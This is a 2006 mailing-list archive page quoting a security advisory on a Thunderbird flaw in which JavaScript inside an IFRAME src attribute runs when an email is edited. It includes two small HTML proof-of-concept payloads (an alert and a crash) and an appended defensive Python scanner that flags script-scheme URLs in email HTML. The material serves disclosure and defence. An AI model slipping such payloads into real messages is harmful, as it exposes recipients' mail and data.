Full Disclosure mailing list archives
Re: Mozilla Thunderbird : Remote Code Execution & Denial of Service
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Wed, 22 Feb 2006 22:32:53 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

You must really have nothing to do, to go looking for bugs in an outdated version, lol :->

Renaud Lifchitz wrote:
Mozilla Thunderbird : Remote Code Execution & Denial of Service

//----- Advisory

Program : Mozilla Thunderbird
Homepage : http://www.mozilla.com/thunderbird/
Tested version : <= 1.0.7
Found by : nono2357 at sysdream dot com
This advisory : nono2357 at sysdream dot com
Discovery date : 2006/01/28

//----- Application description

Full-Featured Email

Simple to use, powerful, and customizable, Thunderbird is a full-featured email application. Thunderbird supports IMAP and POP mail protocols, as well as HTML mail formatting. Easily import your existing email accounts and messages. Built-in RSS capabilities, powerful quick search, spell check as you type, global inbox, deleting attachments and advanced message filtering round out Thunderbird's modern feature set.

//----- Description of vulnerability

Thunderbird's WYSIWYG rendering engine insufficiently filters javascript scripts. It is possible to write javascript in the SRC attribute of the IFRAME tag. This leads to execution when the email is edited (for instance when replying to the email), even if javascript is disabled in the preferences.

//----- Proof Of Concept

* Javascript execution :

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* Denial of service (application crash) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe>
</body>
</html>

//----- Solution

Upgrade to version 1.5.
Download page : http://www.mozilla.com/thunderbird/all.html
Direct link : http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/

//----- Impact

Successful exploitation may lead to information disclosure (application version, platform, user emails, user preferences, ...) or could crash the application.

//----- Credits

http://www.sysdream.com
nono2357 at sysdream dot com

//----- Greetings

crashfr & the hackademy ...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----
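A defensive check for the pattern the quoted advisory describes, added here as an example and not part of the original posts or of Thunderbird: it flags script-scheme URLs in URL-bearing attributes of a message's HTML parts, so a mail filter can quarantine or strip them before the message is opened in a composer. The attribute list beyond IFRAME SRC, the `vbscript:` scheme, the function names and the sample message are assumptions of this example.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# URL-bearing attributes to inspect. The advisory names only IFRAME SRC;
# the other entries are an assumption of this example.
URL_ATTRS = {"src", "href", "action", "data", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

def normalise(value):
    """Drop whitespace and control characters, which URL parsers tolerate
    inside a scheme, then lowercase. HTMLParser has already decoded entities."""
    return re.sub(r"[\x00-\x20]+", "", value or "").lower()

class ScriptUrlFinder(HTMLParser):
    """Collects (tag, attribute, raw value) for every script-scheme URL."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased from HTMLParser.
        for name, value in attrs:
            if name in URL_ATTRS and normalise(value).startswith(SCRIPT_SCHEMES):
                self.findings.append((tag, name, value))

def scan_message(raw):
    """Scan every text/html part of an RFC 822 message given as a string."""
    finder = ScriptUrlFinder()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            body = part.get_payload(decode=True)  # undoes base64 / quoted-printable
            finder.feed(body.decode(charset, errors="replace"))
    finder.close()
    return finder.findings

# Constructed sample message; the iframe line is the form quoted in the advisory.
SAMPLE = """\
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>
<img src="http://example.org/logo.png">
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, value in scan_message(SAMPLE):
        print(f"script URL in <{tag} {attr}>: {value!r}")
```

Matching on the normalised value rather than the raw attribute text is what keeps mixed case, entity encoding or embedded tabs from hiding the scheme from the filter.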
Current thread:
- Mozilla Thunderbird : Remote Code Execution & Denial of Service Renaud Lifchitz (Feb 22)
- Re: Mozilla Thunderbird : Remote Code Execution & Denial of Service ad () heapoverflow com (Feb 22)